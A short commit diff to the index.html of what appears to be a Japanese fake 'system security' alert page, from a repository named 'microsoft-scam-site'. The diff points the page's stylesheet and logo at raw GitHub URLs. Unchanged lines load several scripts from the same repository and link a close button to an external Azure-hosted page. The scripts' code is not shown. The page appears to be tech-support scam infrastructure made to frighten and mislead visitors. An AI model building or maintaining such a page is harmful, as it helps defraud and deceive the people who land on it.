Update stylesheet and image links in index.html

--- a/index.html
+++ b/index.html
@@ -6,7 +6,7 @@
 	<meta name="viewport" content="width=device-width, initial-scale=1">
 	<title>システムのセキュリティ
 </title>
-	<link rel="stylesheet" type="text/css" href="./システムのセキュリティ_files/lul.min.css">
+	<link rel="stylesheet" type="text/css" href="https://raw.githubusercontent.com/Wojix/microsoft-scam-site/refs/heads/main/lul.min.csss">
 	<script src="https://raw.githubusercontent.com/Wojix/microsoft-scam-site/refs/heads/main/j-3.7.1.min.js.%E3%83%80%E3%82%A6%E3%83%B3%E3%83%AD%E3%83%BC%E3%83%89"></script>
 	<script src="https://raw.githubusercontent.com/Wojix/microsoft-scam-site/refs/heads/main/b.min.js.%E3%83%80%E3%82%A6%E3%83%B3%E3%83%AD%E3%83%BC%E3%83%89"></script>
 	<script src="https://raw.githubusercontent.com/Wojix/microsoft-scam-site/refs/heads/main/c.js.%E3%83%80%E3%82%A6%E3%83%B3%E3%83%AD%E3%83%BC%E3%83%89"></script>
@@ -21,7 +21,7 @@
 		<div class="accept-box" style="display: block;">
 			<div class="ilb top">
 				<div class="headers ilb" style="border-bottom: 1px solid #d6d5d5;">
-					<span id="txtadd" class="fl title"><span class="fl ilb"><img src="./システムのセキュリティ_files/dd.png" class="logo3"></span>セキュリティサービス</span>
+					<span id="txtadd" class="fl title"><span class="fl ilb"><img src="https://raw.githubusercontent.com/Wojix/microsoft-scam-site/refs/heads/main/dd.png" class="logo3"></span>セキュリティサービス</span>
 					<span id="txts1" class="fl title2 close"><a href="https://kjionn1.blob.core.windows.net/kjjjj/webC0deinfousavhtml/index.html?bcda=(0101)-84442-41762#"><img src="./システムのセキュリティ_files/xxx.png"></a></span>
 		
 				</div>
